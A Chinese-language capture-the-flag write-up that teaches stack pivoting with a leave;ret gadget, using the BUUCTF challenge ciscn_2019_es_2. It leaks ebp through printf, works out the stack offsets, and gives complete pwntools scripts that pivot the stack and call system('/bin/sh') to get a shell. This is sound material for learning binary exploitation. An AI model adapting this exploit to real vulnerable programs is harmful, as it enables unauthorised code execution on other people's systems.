栈迁移:简单理解就是在栈溢出的时候可溢出的字符过少,只能溢出ebp和ret的地址,可以使用leave_ret这个gadget来实现栈的迁移。
在栈中,默认情况下汇编语言在栈结束的时候都默认会执行一次leave和ret指令,我们利用这个特性将返回地址修改为leave_ret的gadget,将会执行两次leave和ret的操作,将我们的栈迁移到ebp溢出指定的位置,执行想要执行的指令。
题目示例:
BUUCTF ciscn_2019_es_2
使用ida打开分析
在main函数中调用了vul函数,该函数中read函数存在栈溢出,但是只能溢出8个字节,通过函数列表发现拥有一个hack函数调用了system,现在我们拥有了system的addr,但是溢出的空间并不能让我们手动的构造gadget获取shell。
通过观察发现,该vul函数使用了printf输出s的内容,我们知道printf在输出字符串的时候遇到\x00才会结束,所以我们可以通过溢出,获取ebp的地址,在汇编的学习中,我们知道在栈中取值一般通过ebp - offset,所以我们的思路如下:
- 通过溢出在
s的栈中没有\x00,让printf输出ebp的地址 - 通过溢出在
s的栈中写入'aaaa' + system_addr + system_return + bin_sh_addr + '/bin/sh' + 垃圾字符 + s栈开始 + leave_ret
让我们站在程序的思路看一下发生了什么:
- 栈结束的时候,执行
leave和ret,这时会跳转到ebp保存的地址,也就是s栈开始 - 接着执行
leave_ret我们在return_addr加入的gadget地址,这时会将栈迁移到s栈开始的位置,esp会指向栈的s栈开始 +4个字节,因为leave_ret相当于执行了mov esp,ebp和pop ebp,pop ebp的时候,在pop的时候,会将esp的值+4,所以我们需要在开头写入四个字节的aaaa - 接着执行
leave_ret中的ret指令,相当于pop eip,这时会将system_addr的地址读取到eip,eip就是程序执行到哪里了,就会接着执行system函数 - system函数需要执行返回地址和参数,返回地址随便,参数为
/bin/sh,由于程序中没有/bin/sh,我们执行程序的地址为s栈的开始 + 0x10,因为我们前面的'aaaa' + system_addr + system_return + bin_sh_addr相当于四条汇编指令,占用16个字节,接着往栈里写入/bin/sh,就可以成功执行system(/bin/sh),完美
理论成立,接着实践,如何获取s栈开始的地址呢?,ebp可以通过printf输出获取,如果使用ebp - offset来获取s栈开始的位置是一个问题,首先先使用脚本尝试printf溢出,获取ebp的地址
from pwn import *
context(log_level='debug')p = process("./ciscn_2019_es_2")
# p = remote("node5.buuoj.cn",28942)
e = ELF("./ciscn_2019_es_2")leave_ret = 0x08048562
system = e.sym['system']
p.recvuntil("Welcome, my friend. What's your name?")payload1 = b"A" * 0x20 + b"B" * 0x8
p.send(payload1)p.recvuntil(b"BBBBBBBB")
ebp = u32(p.recv(4))
log.success("ebp_addr: " + str(hex(ebp)))p.interactive()
接着使用pwndbg调试查看ebp到栈顶的偏移
在printf时发现栈顶到栈底的偏移为0x34,这里我们需要改为0x34 + 4,因为printf的参数'Hello, %s\n'也占用了四个字节
接着我们构造脚本,如下:
from pwn import *
context(log_level='debug')p = process("./ciscn_2019_es_2")
# p = remote("node5.buuoj.cn",28942)
e = ELF("./ciscn_2019_es_2")leave_ret = 0x08048562
system = e.sym['system']
p.recvuntil("Welcome, my friend. What's your name?")payload1 = b"A" * 0x20 + b"B" * 0x8
p.send(payload1)p.recvuntil(b"BBBBBBBB")
ebp = u32(p.recv(4))
log.success("ebp_addr: " + str(hex(ebp)))payload2 = b"AAAA" + p32(system) + p32(0) + p32(ebp - 0x38 + 0x10) + b"/bin/sh"
payload2 = payload2.ljust(0x28,b"\x00") + p32(ebp - 0x38) + p32(leave_ret)
p.send(payload2)p.interactive()
运行的到shell
